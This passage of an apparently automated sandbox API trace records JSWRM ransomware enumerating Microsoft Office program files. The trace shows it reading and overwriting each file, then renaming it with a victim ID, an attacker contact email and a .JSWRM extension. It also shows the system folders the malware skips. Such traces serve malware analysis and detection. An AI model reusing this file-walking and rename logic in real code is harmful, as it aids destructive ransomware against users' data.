(HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0101.478] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0101.491] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.491] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0101.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.492] CloseHandle (hObject=0x45c) returned 1 [0101.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0101.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0101.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0101.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0101.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0101.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0101.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0101.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0101.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.493] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RInt.16.msi" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rint.16.msi"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RInt.16.msi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rint.16.msi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0101.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0101.493] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe384358e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe384358e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3acbcd3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RIntLoc.en-us.16.msi", cAlternateFileName="C2RINT~2.MSI")) returned 1 [0101.493] lstrcmpiW (lpString1="C2RIntLoc.en-us.16.msi", lpString2=".") returned 1 [0101.493] lstrcmpiW (lpString1="C2RIntLoc.en-us.16.msi", lpString2="..") returned 1 [0101.494] lstrcmpiW (lpString1="C2RIntLoc.en-us.16.msi", lpString2="...") returned 1 [0101.494] lstrcmpiW (lpString1="C2RIntLoc.en-us.16.msi", lpString2="windows") returned -1 [0101.494] lstrcmpiW (lpString1="C2RIntLoc.en-us.16.msi", lpString2="recovery") returned -1 [0101.494] lstrcmpiW (lpString1="C2RIntLoc.en-us.16.msi", lpString2="perflogs") returned -1 [0101.494] lstrcmpiW (lpString1="C2RIntLoc.en-us.16.msi", lpString2="documents and settings") returned -1 [0101.494] lstrcmpiW (lpString1="C2RIntLoc.en-us.16.msi", lpString2="$RECYCLE.BIN") returned 1 [0101.494] lstrcmpiW (lpString1="C2RIntLoc.en-us.16.msi", lpString2="system volume information") returned -1 [0101.494] lstrcmpiW (lpString1="C2RIntLoc.en-us.16.msi", lpString2="msocache") returned -1 [0101.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RIntLoc.en-us.16.msi", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0101.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RIntLoc.en-us.16.msi", cchWideChar=22, lpMultiByteStr=0x241380, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RIntLoc.en-us.16.msi", lpUsedDefaultChar=0x0) returned 22 [0101.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RIntLoc.en-us.16.msi", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0101.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RIntLoc.en-us.16.msi", cchWideChar=22, lpMultiByteStr=0x2413d0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RIntLoc.en-us.16.msi", lpUsedDefaultChar=0x0) returned 22 [0101.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0101.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0101.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0101.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RIntLoc.en-us.16.msi" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rintloc.en-us.16.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.495] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=45056) returned 1 [0101.495] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb000) returned 0x24d210 [0101.495] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb000, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0xb000, lpOverlapped=0x0) returned 1 [0101.526] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.526] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb000, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0xb000, lpOverlapped=0x0) returned 1 [0101.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.526] CloseHandle (hObject=0x45c) returned 1 [0101.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0101.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0101.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0101.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0101.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0101.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0101.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.527] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RIntLoc.en-us.16.msi" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rintloc.en-us.16.msi"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RIntLoc.en-us.16.msi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rintloc.en-us.16.msi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0101.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0101.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0101.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0101.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0101.528] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd23fe538, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd23fe538, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2686ce0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x91f0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", cAlternateFileName="C25A45~1.XML")) returned 1 [0101.528] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.528] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.528] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.528] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.528] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.528] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.528] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.528] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.528] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.528] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0101.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0101.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0101.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 50 [0101.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0101.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0101.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0101.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 50 [0101.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0101.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0101.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0101.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0101.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.529] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=37360) returned 1 [0101.529] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x91f0) returned 0x24d210 [0101.529] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x91f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x91f0, lpOverlapped=0x0) returned 1 [0101.533] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.533] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x91f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x91f0, lpOverlapped=0x0) returned 1 [0101.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.533] CloseHandle (hObject=0x45c) returned 1 [0101.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0101.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0101.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0101.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0101.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0101.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0101.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.534] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.access.access.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0101.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0101.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0101.535] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd32bedda, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd32bedda, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd356d87a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xe71c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.accessmui.msi.16.en-us.xml", cAlternateFileName="C222C2~1.XML")) returned 1 [0101.535] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.535] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.535] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.535] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.535] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.535] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.535] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.535] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.535] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.535] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.accessmui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0101.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.accessmui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.accessmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 38 [0101.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0101.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.accessmui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0101.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.accessmui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.accessmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 38 [0101.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0101.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0101.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0101.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0101.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 